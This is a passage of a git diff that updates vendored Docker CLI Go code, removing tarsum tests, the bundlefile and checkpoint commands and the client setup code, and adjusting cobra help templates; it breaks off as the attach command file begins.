-func TestStatFile(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
-	defer cleanup()
-
-	testFilename := createTestTempFile(t, contextDir, filename, contents, 0777)
-
-	tarSum := &tarSumContext{root: contextDir}
-
-	relPath, fileInfo, err := tarSum.Stat(filename)
-
-	if err != nil {
-		t.Fatalf("Error when executing Stat: %s", err)
-	}
-
-	if relPath != filename {
-		t.Fatalf("Relative path should be equal to %s, got %s", filename, relPath)
-	}
-
-	if fileInfo.Path() != testFilename {
-		t.Fatalf("Full path should be equal to %s, got %s", testFilename, fileInfo.Path())
-	}
-}
-
-func TestStatSubdir(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
-	defer cleanup()
-
-	contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir")
-
-	testFilename := createTestTempFile(t, contextSubdir, filename, contents, 0777)
-
-	tarSum := &tarSumContext{root: contextDir}
-
-	relativePath, err := filepath.Rel(contextDir, testFilename)
-
-	if err != nil {
-		t.Fatalf("Error when getting relative path: %s", err)
-	}
-
-	relPath, fileInfo, err := tarSum.Stat(relativePath)
-
-	if err != nil {
-		t.Fatalf("Error when executing Stat: %s", err)
-	}
-
-	if relPath != relativePath {
-		t.Fatalf("Relative path should be equal to %s, got %s", relativePath, relPath)
-	}
-
-	if fileInfo.Path() != testFilename {
-		t.Fatalf("Full path should be equal to %s, got %s", testFilename, fileInfo.Path())
-	}
-}
-
-func TestStatNotExisting(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
-	defer cleanup()
-
-	tarSum := &tarSumContext{root: contextDir}
-
-	relPath, fileInfo, err := tarSum.Stat("not-existing")
-
-	if relPath != "" {
-		t.Fatal("Relative path should be nil")
-	}
-
-	if fileInfo != nil {
-		t.Fatalf("File info should be nil")
-	}
-
-	if !os.IsNotExist(err) {
-		t.Fatalf("This file should not exist: %s", err)
-	}
-}
-
-func TestRemoveDirectory(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
-	defer cleanup()
-
-	contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir")
-
-	relativePath, err := filepath.Rel(contextDir, contextSubdir)
-
-	if err != nil {
-		t.Fatalf("Error when getting relative path: %s", err)
-	}
-
-	tarSum := &tarSumContext{root: contextDir}
-
-	err = tarSum.Remove(relativePath)
-
-	if err != nil {
-		t.Fatalf("Error when executing Remove: %s", err)
-	}
-
-	_, err = os.Stat(contextSubdir)
-
-	if !os.IsNotExist(err) {
-		t.Fatalf("Directory should not exist at this point")
-	}
-}
-
-func TestMakeTarSumContext(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
-	defer cleanup()
-
-	createTestTempFile(t, contextDir, filename, contents, 0777)
-
-	tarStream, err := archive.Tar(contextDir, archive.Uncompressed)
-
-	if err != nil {
-		t.Fatalf("error: %s", err)
-	}
-
-	defer tarStream.Close()
-
-	tarSum, err := MakeTarSumContext(tarStream)
-
-	if err != nil {
-		t.Fatalf("Error when executing MakeTarSumContext: %s", err)
-	}
-
-	if tarSum == nil {
-		t.Fatalf("Tar sum context should not be nil")
-	}
-}
-
-func TestWalkWithoutError(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
-	defer cleanup()
-
-	contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir")
-
-	createTestTempFile(t, contextSubdir, filename, contents, 0777)
-
-	tarSum := &tarSumContext{root: contextDir}
-
-	walkFun := func(path string, fi FileInfo, err error) error {
-		return nil
-	}
-
-	err := tarSum.Walk(contextSubdir, walkFun)
-
-	if err != nil {
-		t.Fatalf("Error when executing Walk: %s", err)
-	}
-}
-
-type WalkError struct {
-}
-
-func (we WalkError) Error() string {
-	return "Error when executing Walk"
-}
-
-func TestWalkWithError(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
-	defer cleanup()
-
-	contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir")
-
-	tarSum := &tarSumContext{root: contextDir}
-
-	walkFun := func(path string, fi FileInfo, err error) error {
-		return WalkError{}
-	}
-
-	err := tarSum.Walk(contextSubdir, walkFun)
-
-	if err == nil {
-		t.Fatalf("Error should not be nil")
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/cobra.go b/vendor/github.com/docker/docker/cli/cobra.go
index 139845cb1b..8ed1fddc06 100644
--- a/vendor/github.com/docker/docker/cli/cobra.go
+++ b/vendor/github.com/docker/docker/cli/cobra.go
@@ -1,9 +1,9 @@
-package cli
+package cli // import "github.com/docker/docker/cli"
 
 import (
 	"fmt"
-	"strings"
 
+	"github.com/docker/docker/pkg/term"
 	"github.com/spf13/cobra"
 )
 
@@ -14,11 +14,12 @@ func SetupRootCommand(rootCmd *cobra.Command) {
 	cobra.AddTemplateFunc("hasManagementSubCommands", hasManagementSubCommands)
 	cobra.AddTemplateFunc("operationSubCommands", operationSubCommands)
 	cobra.AddTemplateFunc("managementSubCommands", managementSubCommands)
+	cobra.AddTemplateFunc("wrappedFlagUsages", wrappedFlagUsages)
 
 	rootCmd.SetUsageTemplate(usageTemplate)
 	rootCmd.SetHelpTemplate(helpTemplate)
 	rootCmd.SetFlagErrorFunc(FlagErrorFunc)
-	rootCmd.SetHelpCommand(helpCommand)
+	rootCmd.SetVersionTemplate("Docker version {{.Version}}\n")
 
 	rootCmd.PersistentFlags().BoolP("help", "h", false, "Print usage")
 	rootCmd.PersistentFlags().MarkShorthandDeprecated("help", "please use --help")
@@ -28,7 +29,7 @@ func SetupRootCommand(rootCmd *cobra.Command) {
 // docker/docker/cli error messages
 func FlagErrorFunc(cmd *cobra.Command, err error) error {
 	if err == nil {
-		return err
+		return nil
 	}
 
 	usage := ""
@@ -41,23 +42,6 @@ func FlagErrorFunc(cmd *cobra.Command, err error) error {
 	}
 }
 
-var helpCommand = &cobra.Command{
-	Use:               "help [command]",
-	Short:             "Help about the command",
-	PersistentPreRun:  func(cmd *cobra.Command, args []string) {},
-	PersistentPostRun: func(cmd *cobra.Command, args []string) {},
-	RunE: func(c *cobra.Command, args []string) error {
-		cmd, args, e := c.Root().Find(args)
-		if cmd == nil || e != nil || len(args) > 0 {
-			return fmt.Errorf("unknown help topic: %v", strings.Join(args, " "))
-		}
-
-		helpFunc := cmd.HelpFunc()
-		helpFunc(cmd, args)
-		return nil
-	},
-}
-
 func hasSubCommands(cmd *cobra.Command) bool {
 	return len(operationSubCommands(cmd)) > 0
 }
@@ -67,7 +51,7 @@ func hasManagementSubCommands(cmd *cobra.Command) bool {
 }
 
 func operationSubCommands(cmd *cobra.Command) []*cobra.Command {
-	cmds := []*cobra.Command{}
+	var cmds []*cobra.Command
 	for _, sub := range cmd.Commands() {
 		if sub.IsAvailableCommand() && !sub.HasSubCommands() {
 			cmds = append(cmds, sub)
@@ -76,8 +60,16 @@ func operationSubCommands(cmd *cobra.Command) []*cobra.Command {
 	return cmds
 }
 
+func wrappedFlagUsages(cmd *cobra.Command) string {
+	width := 80
+	if ws, err := term.GetWinsize(0); err == nil {
+		width = int(ws.Width)
+	}
+	return cmd.Flags().FlagUsagesWrapped(width - 1)
+}
+
 func managementSubCommands(cmd *cobra.Command) []*cobra.Command {
-	cmds := []*cobra.Command{}
+	var cmds []*cobra.Command
 	for _, sub := range cmd.Commands() {
 		if sub.IsAvailableCommand() && sub.HasSubCommands() {
 			cmds = append(cmds, sub)
@@ -105,10 +97,10 @@ Examples:
 {{ .Example }}
 
 {{- end}}
-{{- if .HasFlags}}
+{{- if .HasAvailableFlags}}
 
 Options:
-{{.Flags.FlagUsages | trimRightSpace}}
+{{ wrappedFlagUsages . | trimRightSpace}}
 
 {{- end}}
 {{- if hasManagementSubCommands . }}
diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go
deleted file mode 100644
index 7fd1e4f6c4..0000000000
--- a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile.go
+++ /dev/null
@@ -1,69 +0,0 @@
-package bundlefile
-
-import (
-	"encoding/json"
-	"fmt"
-	"io"
-)
-
-// Bundlefile stores the contents of a bundlefile
-type Bundlefile struct {
-	Version  string
-	Services map[string]Service
-}
-
-// Service is a service from a bundlefile
-type Service struct {
-	Image      string
-	Command    []string          `json:",omitempty"`
-	Args       []string          `json:",omitempty"`
-	Env        []string          `json:",omitempty"`
-	Labels     map[string]string `json:",omitempty"`
-	Ports      []Port            `json:",omitempty"`
-	WorkingDir *string           `json:",omitempty"`
-	User       *string           `json:",omitempty"`
-	Networks   []string          `json:",omitempty"`
-}
-
-// Port is a port as defined in a bundlefile
-type Port struct {
-	Protocol string
-	Port     uint32
-}
-
-// LoadFile loads a bundlefile from a path to the file
-func LoadFile(reader io.Reader) (*Bundlefile, error) {
-	bundlefile := &Bundlefile{}
-
-	decoder := json.NewDecoder(reader)
-	if err := decoder.Decode(bundlefile); err != nil {
-		switch jsonErr := err.(type) {
-		case *json.SyntaxError:
-			return nil, fmt.Errorf(
-				"JSON syntax error at byte %v: %s",
-				jsonErr.Offset,
-				jsonErr.Error())
-		case *json.UnmarshalTypeError:
-			return nil, fmt.Errorf(
-				"Unexpected type at byte %v. Expected %s but received %s.",
-				jsonErr.Offset,
-				jsonErr.Type,
-				jsonErr.Value)
-		}
-		return nil, err
-	}
-
-	return bundlefile, nil
-}
-
-// Print writes the contents of the bundlefile to the output writer
-// as human readable json
-func Print(out io.Writer, bundle *Bundlefile) error {
-	bytes, err := json.MarshalIndent(*bundle, "", "    ")
-	if err != nil {
-		return err
-	}
-
-	_, err = out.Write(bytes)
-	return err
-}
diff --git a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go b/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go
deleted file mode 100644
index c343410df3..0000000000
--- a/vendor/github.com/docker/docker/cli/command/bundlefile/bundlefile_test.go
+++ /dev/null
@@ -1,77 +0,0 @@
-package bundlefile
-
-import (
-	"bytes"
-	"strings"
-	"testing"
-
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestLoadFileV01Success(t *testing.T) {
-	reader := strings.NewReader(`{
-		"Version": "0.1",
-		"Services": {
-			"redis": {
-				"Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce",
-				"Networks": ["default"]
-			},
-			"web": {
-				"Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d",
-				"Networks": ["default"],
-				"User": "web"
-			}
-		}
-	}`)
-
-	bundle, err := LoadFile(reader)
-	assert.NilError(t, err)
-	assert.Equal(t, bundle.Version, "0.1")
-	assert.Equal(t, len(bundle.Services), 2)
-}
-
-func TestLoadFileSyntaxError(t *testing.T) {
-	reader := strings.NewReader(`{
-		"Version": "0.1",
-		"Services": unquoted string
-	}`)
-
-	_, err := LoadFile(reader)
-	assert.Error(t, err, "syntax error at byte 37: invalid character 'u'")
-}
-
-func TestLoadFileTypeError(t *testing.T) {
-	reader := strings.NewReader(`{
-		"Version": "0.1",
-		"Services": {
-			"web": {
-				"Image": "redis",
-				"Networks": "none"
-			}
-		}
-	}`)
-
-	_, err := LoadFile(reader)
-	assert.Error(t, err, "Unexpected type at byte 94. Expected []string but received string")
-}
-
-func TestPrint(t *testing.T) {
-	var buffer bytes.Buffer
-	bundle := &Bundlefile{
-		Version: "0.1",
-		Services: map[string]Service{
-			"web": {
-				Image:   "image",
-				Command: []string{"echo", "something"},
-			},
-		},
-	}
-	assert.NilError(t, Print(&buffer, bundle))
-	output := buffer.String()
-	assert.Contains(t, output, "\"Image\": \"image\"")
-	assert.Contains(t, output,
-		`"Command": [
-                "echo",
-                "something"
-            ]`)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go b/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go
deleted file mode 100644
index d5705a4dad..0000000000
--- a/vendor/github.com/docker/docker/cli/command/checkpoint/cmd.go
+++ /dev/null
@@ -1,24 +0,0 @@
-package checkpoint
-
-import (
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-// NewCheckpointCommand returns the `checkpoint` subcommand (only in experimental)
-func NewCheckpointCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "checkpoint",
-		Short: "Manage checkpoints",
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-		Tags:  map[string]string{"experimental": "", "version": "1.25"},
-	}
-	cmd.AddCommand(
-		newCreateCommand(dockerCli),
-		newListCommand(dockerCli),
-		newRemoveCommand(dockerCli),
-	)
-	return cmd
-}
diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/create.go b/vendor/github.com/docker/docker/cli/command/checkpoint/create.go
deleted file mode 100644
index 473a941733..0000000000
--- a/vendor/github.com/docker/docker/cli/command/checkpoint/create.go
+++ /dev/null
@@ -1,58 +0,0 @@
-package checkpoint
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type createOptions struct {
-	container     string
-	checkpoint    string
-	checkpointDir string
-	leaveRunning  bool
-}
-
-func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts createOptions
-
-	cmd := &cobra.Command{
-		Use:   "create [OPTIONS] CONTAINER CHECKPOINT",
-		Short: "Create a checkpoint from a running container",
-		Args:  cli.ExactArgs(2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.container = args[0]
-			opts.checkpoint = args[1]
-			return runCreate(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVar(&opts.leaveRunning, "leave-running", false, "Leave the container running after checkpoint")
-	flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory")
-
-	return cmd
-}
-
-func runCreate(dockerCli *command.DockerCli, opts createOptions) error {
-	client := dockerCli.Client()
-
-	checkpointOpts := types.CheckpointCreateOptions{
-		CheckpointID:  opts.checkpoint,
-		CheckpointDir: opts.checkpointDir,
-		Exit:          !opts.leaveRunning,
-	}
-
-	err := client.CheckpointCreate(context.Background(), opts.container, checkpointOpts)
-	if err != nil {
-		return err
-	}
-
-	fmt.Fprintf(dockerCli.Out(), "%s\n", opts.checkpoint)
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/list.go b/vendor/github.com/docker/docker/cli/command/checkpoint/list.go
deleted file mode 100644
index daf8349993..0000000000
--- a/vendor/github.com/docker/docker/cli/command/checkpoint/list.go
+++ /dev/null
@@ -1,62 +0,0 @@
-package checkpoint
-
-import (
-	"fmt"
-	"text/tabwriter"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type listOptions struct {
-	checkpointDir string
-}
-
-func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts listOptions
-
-	cmd := &cobra.Command{
-		Use:     "ls [OPTIONS] CONTAINER",
-		Aliases: []string{"list"},
-		Short:   "List checkpoints for a container",
-		Args:    cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runList(dockerCli, args[0], opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory")
-
-	return cmd
-
-}
-
-func runList(dockerCli *command.DockerCli, container string, opts listOptions) error {
-	client := dockerCli.Client()
-
-	listOpts := types.CheckpointListOptions{
-		CheckpointDir: opts.checkpointDir,
-	}
-
-	checkpoints, err := client.CheckpointList(context.Background(), container, listOpts)
-	if err != nil {
-		return err
-	}
-
-	w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0)
-	fmt.Fprintf(w, "CHECKPOINT NAME")
-	fmt.Fprintf(w, "\n")
-
-	for _, checkpoint := range checkpoints {
-		fmt.Fprintf(w, "%s\t", checkpoint.Name)
-		fmt.Fprint(w, "\n")
-	}
-
-	w.Flush()
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go b/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go
deleted file mode 100644
index ec39fa7b55..0000000000
--- a/vendor/github.com/docker/docker/cli/command/checkpoint/remove.go
+++ /dev/null
@@ -1,44 +0,0 @@
-package checkpoint
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type removeOptions struct {
-	checkpointDir string
-}
-
-func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts removeOptions
-
-	cmd := &cobra.Command{
-		Use:     "rm [OPTIONS] CONTAINER CHECKPOINT",
-		Aliases: []string{"remove"},
-		Short:   "Remove a checkpoint",
-		Args:    cli.ExactArgs(2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runRemove(dockerCli, args[0], args[1], opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.StringVarP(&opts.checkpointDir, "checkpoint-dir", "", "", "Use a custom checkpoint storage directory")
-
-	return cmd
-}
-
-func runRemove(dockerCli *command.DockerCli, container string, checkpoint string, opts removeOptions) error {
-	client := dockerCli.Client()
-
-	removeOpts := types.CheckpointDeleteOptions{
-		CheckpointID:  checkpoint,
-		CheckpointDir: opts.checkpointDir,
-	}
-
-	return client.CheckpointDelete(context.Background(), container, removeOpts)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/cli.go b/vendor/github.com/docker/docker/cli/command/cli.go
deleted file mode 100644
index 6d1dd7472e..0000000000
--- a/vendor/github.com/docker/docker/cli/command/cli.go
+++ /dev/null
@@ -1,260 +0,0 @@
-package command
-
-import (
-	"errors"
-	"fmt"
-	"io"
-	"net/http"
-	"os"
-	"path/filepath"
-	"runtime"
-
-	"github.com/docker/docker/api"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/versions"
-	cliflags "github.com/docker/docker/cli/flags"
-	"github.com/docker/docker/cliconfig"
-	"github.com/docker/docker/cliconfig/configfile"
-	"github.com/docker/docker/cliconfig/credentials"
-	"github.com/docker/docker/client"
-	"github.com/docker/docker/dockerversion"
-	dopts "github.com/docker/docker/opts"
-	"github.com/docker/go-connections/sockets"
-	"github.com/docker/go-connections/tlsconfig"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-// Streams is an interface which exposes the standard input and output streams
-type Streams interface {
-	In() *InStream
-	Out() *OutStream
-	Err() io.Writer
-}
-
-// DockerCli represents the docker command line client.
-// Instances of the client can be returned from NewDockerCli.
-type DockerCli struct {
-	configFile      *configfile.ConfigFile
-	in              *InStream
-	out             *OutStream
-	err             io.Writer
-	keyFile         string
-	client          client.APIClient
-	hasExperimental bool
-	defaultVersion  string
-}
-
-// HasExperimental returns true if experimental features are accessible.
-func (cli *DockerCli) HasExperimental() bool {
-	return cli.hasExperimental
-}
-
-// DefaultVersion returns api.defaultVersion of DOCKER_API_VERSION if specified.
-func (cli *DockerCli) DefaultVersion() string {
-	return cli.defaultVersion
-}
-
-// Client returns the APIClient
-func (cli *DockerCli) Client() client.APIClient {
-	return cli.client
-}
-
-// Out returns the writer used for stdout
-func (cli *DockerCli) Out() *OutStream {
-	return cli.out
-}
-
-// Err returns the writer used for stderr
-func (cli *DockerCli) Err() io.Writer {
-	return cli.err
-}
-
-// In returns the reader used for stdin
-func (cli *DockerCli) In() *InStream {
-	return cli.in
-}
-
-// ShowHelp shows the command help.
-func (cli *DockerCli) ShowHelp(cmd *cobra.Command, args []string) error {
-	cmd.SetOutput(cli.err)
-	cmd.HelpFunc()(cmd, args)
-	return nil
-}
-
-// ConfigFile returns the ConfigFile
-func (cli *DockerCli) ConfigFile() *configfile.ConfigFile {
-	return cli.configFile
-}
-
-// GetAllCredentials returns all of the credentials stored in all of the
-// configured credential stores.
-func (cli *DockerCli) GetAllCredentials() (map[string]types.AuthConfig, error) {
-	auths := make(map[string]types.AuthConfig)
-	for registry := range cli.configFile.CredentialHelpers {
-		helper := cli.CredentialsStore(registry)
-		newAuths, err := helper.GetAll()
-		if err != nil {
-			return nil, err
-		}
-		addAll(auths, newAuths)
-	}
-	defaultStore := cli.CredentialsStore("")
-	newAuths, err := defaultStore.GetAll()
-	if err != nil {
-		return nil, err
-	}
-	addAll(auths, newAuths)
-	return auths, nil
-}
-
-func addAll(to, from map[string]types.AuthConfig) {
-	for reg, ac := range from {
-		to[reg] = ac
-	}
-}
-
-// CredentialsStore returns a new credentials store based
-// on the settings provided in the configuration file. Empty string returns
-// the default credential store.
-func (cli *DockerCli) CredentialsStore(serverAddress string) credentials.Store {
-	if helper := getConfiguredCredentialStore(cli.configFile, serverAddress); helper != "" {
-		return credentials.NewNativeStore(cli.configFile, helper)
-	}
-	return credentials.NewFileStore(cli.configFile)
-}
-
-// getConfiguredCredentialStore returns the credential helper configured for the
-// given registry, the default credsStore, or the empty string if neither are
-// configured.
-func getConfiguredCredentialStore(c *configfile.ConfigFile, serverAddress string) string {
-	if c.CredentialHelpers != nil && serverAddress != "" {
-		if helper, exists := c.CredentialHelpers[serverAddress]; exists {
-			return helper
-		}
-	}
-	return c.CredentialsStore
-}
-
-// Initialize the dockerCli runs initialization that must happen after command
-// line flags are parsed.
-func (cli *DockerCli) Initialize(opts *cliflags.ClientOptions) error {
-	cli.configFile = LoadDefaultConfigFile(cli.err)
-
-	var err error
-	cli.client, err = NewAPIClientFromFlags(opts.Common, cli.configFile)
-	if err != nil {
-		return err
-	}
-
-	cli.defaultVersion = cli.client.ClientVersion()
-
-	if opts.Common.TrustKey == "" {
-		cli.keyFile = filepath.Join(cliconfig.ConfigDir(), cliflags.DefaultTrustKeyFile)
-	} else {
-		cli.keyFile = opts.Common.TrustKey
-	}
-
-	if ping, err := cli.client.Ping(context.Background()); err == nil {
-		cli.hasExperimental = ping.Experimental
-
-		// since the new header was added in 1.25, assume server is 1.24 if header is not present.
-		if ping.APIVersion == "" {
-			ping.APIVersion = "1.24"
-		}
-
-		// if server version is lower than the current cli, downgrade
-		if versions.LessThan(ping.APIVersion, cli.client.ClientVersion()) {
-			cli.client.UpdateClientVersion(ping.APIVersion)
-		}
-	}
-	return nil
-}
-
-// NewDockerCli returns a DockerCli instance with IO output and error streams set by in, out and err.
-func NewDockerCli(in io.ReadCloser, out, err io.Writer) *DockerCli {
-	return &DockerCli{in: NewInStream(in), out: NewOutStream(out), err: err}
-}
-
-// LoadDefaultConfigFile attempts to load the default config file and returns
-// an initialized ConfigFile struct if none is found.
-func LoadDefaultConfigFile(err io.Writer) *configfile.ConfigFile {
-	configFile, e := cliconfig.Load(cliconfig.ConfigDir())
-	if e != nil {
-		fmt.Fprintf(err, "WARNING: Error loading config file:%v\n", e)
-	}
-	if !configFile.ContainsAuth() {
-		credentials.DetectDefaultStore(configFile)
-	}
-	return configFile
-}
-
-// NewAPIClientFromFlags creates a new APIClient from command line flags
-func NewAPIClientFromFlags(opts *cliflags.CommonOptions, configFile *configfile.ConfigFile) (client.APIClient, error) {
-	host, err := getServerHost(opts.Hosts, opts.TLSOptions)
-	if err != nil {
-		return &client.Client{}, err
-	}
-
-	customHeaders := configFile.HTTPHeaders
-	if customHeaders == nil {
-		customHeaders = map[string]string{}
-	}
-	customHeaders["User-Agent"] = UserAgent()
-
-	verStr := api.DefaultVersion
-	if tmpStr := os.Getenv("DOCKER_API_VERSION"); tmpStr != "" {
-		verStr = tmpStr
-	}
-
-	httpClient, err := newHTTPClient(host, opts.TLSOptions)
-	if err != nil {
-		return &client.Client{}, err
-	}
-
-	return client.NewClient(host, verStr, httpClient, customHeaders)
-}
-
-func getServerHost(hosts []string, tlsOptions *tlsconfig.Options) (host string, err error) {
-	switch len(hosts) {
-	case 0:
-		host = os.Getenv("DOCKER_HOST")
-	case 1:
-		host = hosts[0]
-	default:
-		return "", errors.New("Please specify only one -H")
-	}
-
-	host, err = dopts.ParseHost(tlsOptions != nil, host)
-	return
-}
-
-func newHTTPClient(host string, tlsOptions *tlsconfig.Options) (*http.Client, error) {
-	if tlsOptions == nil {
-		// let the api client configure the default transport.
-		return nil, nil
-	}
-
-	config, err := tlsconfig.Client(*tlsOptions)
-	if err != nil {
-		return nil, err
-	}
-	tr := &http.Transport{
-		TLSClientConfig: config,
-	}
-	proto, addr, _, err := client.ParseHost(host)
-	if err != nil {
-		return nil, err
-	}
-
-	sockets.ConfigureTransport(tr, proto, addr)
-
-	return &http.Client{
-		Transport: tr,
-	}, nil
-}
-
-// UserAgent returns the user agent string used for making API requests
-func UserAgent() string {
-	return "Docker-Client/" + dockerversion.Version + " (" + runtime.GOOS + ")"
-}
diff --git a/vendor/github.com/docker/docker/cli/command/commands/commands.go b/vendor/github.com/docker/docker/cli/command/commands/commands.go
deleted file mode 100644
index d64d5680cc..0000000000
--- a/vendor/github.com/docker/docker/cli/command/commands/commands.go
+++ /dev/null
@@ -1,91 +0,0 @@
-package commands
-
-import (
-	"os"
-
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/checkpoint"
-	"github.com/docker/docker/cli/command/container"
-	"github.com/docker/docker/cli/command/image"
-	"github.com/docker/docker/cli/command/network"
-	"github.com/docker/docker/cli/command/node"
-	"github.com/docker/docker/cli/command/plugin"
-	"github.com/docker/docker/cli/command/registry"
-	"github.com/docker/docker/cli/command/secret"
-	"github.com/docker/docker/cli/command/service"
-	"github.com/docker/docker/cli/command/stack"
-	"github.com/docker/docker/cli/command/swarm"
-	"github.com/docker/docker/cli/command/system"
-	"github.com/docker/docker/cli/command/volume"
-	"github.com/spf13/cobra"
-)
-
-// AddCommands adds all the commands from cli/command to the root command
-func AddCommands(cmd *cobra.Command, dockerCli *command.DockerCli) {
-	cmd.AddCommand(
-		node.NewNodeCommand(dockerCli),
-		service.NewServiceCommand(dockerCli),
-		swarm.NewSwarmCommand(dockerCli),
-		secret.NewSecretCommand(dockerCli),
-		container.NewContainerCommand(dockerCli),
-		image.NewImageCommand(dockerCli),
-		system.NewSystemCommand(dockerCli),
-		container.NewRunCommand(dockerCli),
-		image.NewBuildCommand(dockerCli),
-		network.NewNetworkCommand(dockerCli),
-		hide(system.NewEventsCommand(dockerCli)),
-		registry.NewLoginCommand(dockerCli),
-		registry.NewLogoutCommand(dockerCli),
-		registry.NewSearchCommand(dockerCli),
-		system.NewVersionCommand(dockerCli),
-		volume.NewVolumeCommand(dockerCli),
-		hide(system.NewInfoCommand(dockerCli)),
-		hide(container.NewAttachCommand(dockerCli)),
-		hide(container.NewCommitCommand(dockerCli)),
-		hide(container.NewCopyCommand(dockerCli)),
-		hide(container.NewCreateCommand(dockerCli)),
-		hide(container.NewDiffCommand(dockerCli)),
-		hide(container.NewExecCommand(dockerCli)),
-		hide(container.NewExportCommand(dockerCli)),
-		hide(container.NewKillCommand(dockerCli)),
-		hide(container.NewLogsCommand(dockerCli)),
-		hide(container.NewPauseCommand(dockerCli)),
-		hide(container.NewPortCommand(dockerCli)),
-		hide(container.NewPsCommand(dockerCli)),
-		hide(container.NewRenameCommand(dockerCli)),
-		hide(container.NewRestartCommand(dockerCli)),
-		hide(container.NewRmCommand(dockerCli)),
-		hide(container.NewStartCommand(dockerCli)),
-		hide(container.NewStatsCommand(dockerCli)),
-		hide(container.NewStopCommand(dockerCli)),
-		hide(container.NewTopCommand(dockerCli)),
-		hide(container.NewUnpauseCommand(dockerCli)),
-		hide(container.NewUpdateCommand(dockerCli)),
-		hide(container.NewWaitCommand(dockerCli)),
-		hide(image.NewHistoryCommand(dockerCli)),
-		hide(image.NewImagesCommand(dockerCli)),
-		hide(image.NewImportCommand(dockerCli)),
-		hide(image.NewLoadCommand(dockerCli)),
-		hide(image.NewPullCommand(dockerCli)),
-		hide(image.NewPushCommand(dockerCli)),
-		hide(image.NewRemoveCommand(dockerCli)),
-		hide(image.NewSaveCommand(dockerCli)),
-		hide(image.NewTagCommand(dockerCli)),
-		hide(system.NewInspectCommand(dockerCli)),
-		stack.NewStackCommand(dockerCli),
-		stack.NewTopLevelDeployCommand(dockerCli),
-		checkpoint.NewCheckpointCommand(dockerCli),
-		plugin.NewPluginCommand(dockerCli),
-	)
-
-}
-
-func hide(cmd *cobra.Command) *cobra.Command {
-	if os.Getenv("DOCKER_HIDE_LEGACY_COMMANDS") == "" {
-		return cmd
-	}
-	cmdCopy := *cmd
-	cmdCopy.Hidden = true
-	cmdCopy.Aliases = []string{}
-	return &cmdCopy
-}
diff --git a/vendor/github.com/docker/docker/cli/command/container/attach.go b/vendor/github.com/docker/docker/cli/command/container/attach.go
deleted file mode 100644
index 31bb109344..0000000000
--- a/vendor/github.com/docker/docker/cli/command/container/attach.go
+++ /dev/null
@@ -1,130 +0,0 @@
-package container
-
-import (
-	"fmt"
-	"io"
-	"net/http/httputil"
-
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/signal"
-	"github.com/spf13/cobra"
-)
-
-type attachOptions struct {
-	noStdin    bool
-	proxy      bool
-	detachKeys string
-
-	container string
-}
-
-// NewAttachCommand creates a new cobra.Command for `docker attach`
